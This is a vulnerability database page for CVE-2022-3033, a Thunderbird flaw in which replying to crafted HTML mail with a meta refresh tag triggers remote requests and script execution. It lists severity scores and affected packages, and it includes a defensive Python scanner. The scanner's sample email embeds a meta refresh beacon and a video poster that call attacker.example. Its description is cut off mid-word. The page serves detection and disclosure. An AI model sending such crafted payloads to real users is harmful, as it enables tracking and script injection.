CVE-2022-3033: Cross-site Scripting in Mozilla Thunderbird

Severity: 8.1 HIGH (NVD) / 8.8 (OSV)
EPSS: 0.7% (top 27.00%)
CISA KEV: Not in KEV
Exploit: No known exploits
Timeline: Published Dec 22

Description

If a Thunderbird user replied to a crafted HTML email containing a meta tag, with the meta tag having the http-equiv="refresh" attribute and the content attribute specifying a URL, then Thunderbird started a network request to that URL, regardless of the configuration setting to block remote content. In combination with certain other HTML elements and attributes in the email, it was possible to execute JavaScript code included in the message in the context of the message compose document. The JavaScri
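The trigger described above is visible in the raw message itself: a meta refresh tag inside the HTML part whose content attribute carries a URL. The related advisory listed below (CVE-2022-45414) names a second quoting trigger, a VIDEO tag with a POSTER attribute. The following scanner is an added example, not code from cvebase or Mozilla; it parses an RFC 5322 message, walks its text/html parts, and reports the remote URLs those two constructs would have made Thunderbird fetch while quoting. The sample message and the attacker.example URLs are constructed for the demonstration, and the regex that pulls the URL out of the content attribute is a simplification of how a browser parses meta refresh.

```python
"""Flag HTML mail constructs that Thunderbird 102.x fetched while quoting a
message (CVE-2022-3033: <meta http-equiv="refresh" content="...url=...">;
CVE-2022-45414: <video poster="...">), even with remote content blocked.
This is a triage aid for a mail gateway or mailbox audit; it flags messages
that carry the trigger, it does not prove they exploited anything.
"""
import email
import re
from email import policy
from html.parser import HTMLParser


class _RemoteLoadFinder(HTMLParser):
    """Collect (kind, url, cve) tuples for the two quoting triggers."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Attribute names are case-insensitive; a bare attribute has value None.
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").strip().lower() == "refresh":
            # content looks like "0; url=https://..." (simplified extraction)
            m = re.search(r"url\s*=\s*['\"]?([^'\";]+)", a.get("content", ""), re.I)
            url = m.group(1).strip() if m else None
            self.findings.append(("meta-refresh", url, "CVE-2022-3033"))
        elif tag == "video" and "poster" in a:
            self.findings.append(("video-poster", a["poster"].strip(), "CVE-2022-45414"))


def scan_message(raw: bytes):
    """Return every quoting trigger found in the text/html parts of a message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        finder = _RemoteLoadFinder()
        finder.feed(part.get_content())
        findings.extend(finder.findings)
    return findings


# Constructed sample: a multipart/alternative message whose HTML part carries
# both triggers. Addresses and URLs are placeholders, not real infrastructure.
SAMPLE_EML = b"""From: sender@example.com
To: victim@example.net
Subject: quarterly numbers
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset=utf-8

see attached

--b1
Content-Type: text/html; charset=utf-8

<html><head>
<meta http-equiv="refresh" content="0; url=https://attacker.example/beacon?id=1">
</head><body>
<p>see attached</p>
<video poster="https://attacker.example/poster.png"></video>
</body></html>

--b1--
"""


if __name__ == "__main__":
    for kind, url, cve in scan_message(SAMPLE_EML):
        print(f"{cve}: {kind} -> {url}")
```

Run it against a mailbox export (one .eml per message) and treat any hit on a message that users may still reply to from a Thunderbird build older than the fixed versions listed under Affected Packages as worth quarantining; the meta refresh finding is the one this CVE describes, the poster finding belongs to the companion advisory.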

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
Exploitability: 2.8 | Impact: 5.2

Affected Packages (6 packages)

Source      Package               Introduced / range                       Fixed     More
debian      debian/thunderbird    < 1:102.2.1-1 (bookworm)                           +1
CVEListV5   mozilla/thunderbird   unspecified                              102.5.1
NVD         mozilla/thunderbird   102.0                                    102.2.1   +2
Debian      mozilla/thunderbird   < 1:102.6.0-1~deb11u1                              +6
Ubuntu      mozilla/thunderbird   < 1:102.2.2+build1-0ubuntu0.18.04.1                +2

("+N" marks additional ranges for that source that are not shown on this page.)

Vulnerability Details (5)

OSV   | CVE-2022-3033: If a Thunderbird user replied to a crafted HTML email containing a meta tag, with the meta tag having the http-equiv="refresh" attribute, and the cont | 2022-12-22
GHSA  | GHSA-gvhr-fq94-q7h9: If a Thunderbird user quoted from an HTML email, for example by replying to the email, and the email contained either a VIDEO tag with the POSTER attr | 2022-12-22
GHSA  | GHSA-q68w-fq74-6jp9: If a Thunderbird user replied to a crafted HTML email containing a meta tag, with the meta tag having the http-equiv="refresh" attribute, and the cont | 2022-12-22
OSV   | CVE-2022-45414: If a Thunderbird user quoted from an HTML email, for example by replying to the email, and the email contained either a VIDEO tag with the POSTER attr | 2022-12-22
OSV   | thunderbird vulnerabilities | 2022-10-07

Vendor Advisories (8)

Red Hat | Mozilla: Quoting from an HTML email with certain tags will trigger network requests and load remote content, regardless of a configuration to block remote content | 2022-11-30
Ubuntu  | Thunderbird vulnerabilities | 2022-10-07
Red Hat | Mozilla: Leaking of sensitive information when composing a response to an HTML email with a META refresh tag | 2022-08-31
Debian  | CVE-2022-3033: thunderbird - If a Thunderbird user replied to a crafted HTML email containing a meta... | 2022
Debian  | CVE-2022-45414: thunderbird - If a Thunderbird user quoted from an HTML email, for example by replying to the ... | 2022
CVE-2022-3033 — Cross-site Scripting in Mozilla | cvebase